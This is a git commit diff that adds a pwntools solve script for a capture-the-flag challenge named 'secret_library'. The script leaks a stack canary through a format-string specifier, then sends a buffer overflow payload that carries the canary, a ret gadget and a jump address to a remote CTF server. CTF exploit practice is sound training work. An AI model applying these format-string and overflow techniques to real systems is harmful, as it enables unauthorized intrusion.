Second CTFs part

2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions
--- a/canary/04_secret_library/solve.py
+++ b/canary/04_secret_library/solve.py
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+from pwn import *
+
+CANARY_POS = 23 
+CANARY_OFF = 136
+elf = context.binary = ELF("./secret_library", checksec=False)
+
+#p = process(elf.path)
+p = remote('offsec.m0lecon.it', 13501)
+print(p.recvline())
+p.sendline(f"%{CANARY_POS}$lx".encode())
+val = p.recvline().split(b",")[1].strip()
+print(val)
+canary = int(val, 16)
+print(p.recvline())
+payload = flat(
+    b'A' * CANARY_OFF,
+    p64(canary),
+    b'B' * 8, #pass rbp
+    p64(0x000000000040101a),
+    p64(0x0000000000401262),
+)
+p.send(payload)
+print(p.recvline())
+#print(p.recvline())
+p.interactive()